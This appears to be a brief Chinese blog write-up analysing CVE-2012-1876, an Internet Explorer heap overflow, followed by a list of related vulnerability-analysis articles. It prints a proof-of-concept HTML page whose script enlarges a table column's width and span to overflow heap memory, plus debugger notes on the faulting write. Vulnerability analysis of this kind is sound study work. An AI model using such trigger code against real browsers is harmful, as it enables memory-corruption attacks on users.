CVE-2012-1876漏洞分析
0.POC檔案
1 <html> 2 <body> 3 <table style="table-layout:fixed" > 4 <col id="132" width="41" span="1" >  </col> 5 </table> 6 <script> 7 8 function over_trigger() { 9 var obj_col = document.getElementById("132"); 10 obj_col.width = "42765"; 11 obj_col.span = 1000; 12 } 13 14 setTimeout("over_trigger();",10); 15 16 </script> 17 </body> 18 </html>
1.漏洞復現
環境如下
2.漏洞分析
開啟POC檔案即發生異常,掛載偵錯程式。異常情況如圖
注意0x9A99000位置記憶體不可寫入導致異常,圖示是增加了寫許可權後的記憶體示意圖。
分析可知,是堆溢位超出堆邊界導致嘗試寫入不可寫入的記憶體地址而引發了異常。
異常語句如圖
edi的值為0x9A99000
mov [0x9A99000],ecx
引發異常
相關文章
- Internet Explorer漏洞分析(一)——CVE-2012-1876
- Internet Explorer漏洞分析系列(一)——CVE-2012-1876
- 【漏洞分析】KaoyaSwap 安全事件分析事件
- BlueKeep 漏洞利用分析
- XSS漏洞分析
- 漏洞分析 | Dubbo2.7.7反序列化漏洞繞過分析
- PfSense命令注入漏洞分析
- SSRF漏洞簡單分析
- JSON劫持漏洞分析JSON
- 從exp入手分析漏洞
- 漏洞分析——變數缺陷漏洞及通用異常捕獲宣告缺陷漏洞變數
- 軟體漏洞分析技巧分享
- Java安全之Axis漏洞分析Java
- 【漏洞分析】ReflectionToken BEVO代幣攻擊事件分析事件
- 某CCTV攝像頭漏洞分析
- Joomla 物件注入漏洞分析報告OOM物件
- CORS漏洞的學習與分析CORS
- Windows PrintDemon提權漏洞分析Windows
- Java安全之XStream 漏洞分析Java
- 【漏洞復現】Paraluni 安全事件分析事件
- Sunlogin RCE漏洞分析和使用
- 漏洞挖掘分析技術總結
- 網站漏洞修復服務商關於越權漏洞分析網站
- Apache Tomcat檔案包含漏洞分析ApacheTomcat
- 安卓Bug 17356824 BroadcastAnywhere漏洞分析安卓AST
- 某EXCEL漏洞樣本shellcode分析Excel
- Shellshock漏洞回顧與分析測試
- Android uncovers master-key 漏洞分析AndroidAST
- WordPress 3.8.2 cookie偽造漏洞再分析Cookie
- 關於libStagefright系列漏洞分析
- 漏洞掛馬網站趨勢分析網站
- WinRAR(5.21)-0day漏洞-始末分析
- [javaweb]strut2-001漏洞分析JavaWeb
- 從0開始fastjson漏洞分析ASTJSON
- CVE-2017-8890漏洞分析
- Log4j漏洞原始碼分析原始碼
- SMT整型溢位漏洞分析筆記筆記
- phpcmsv9.6注入漏洞詳細分析PHP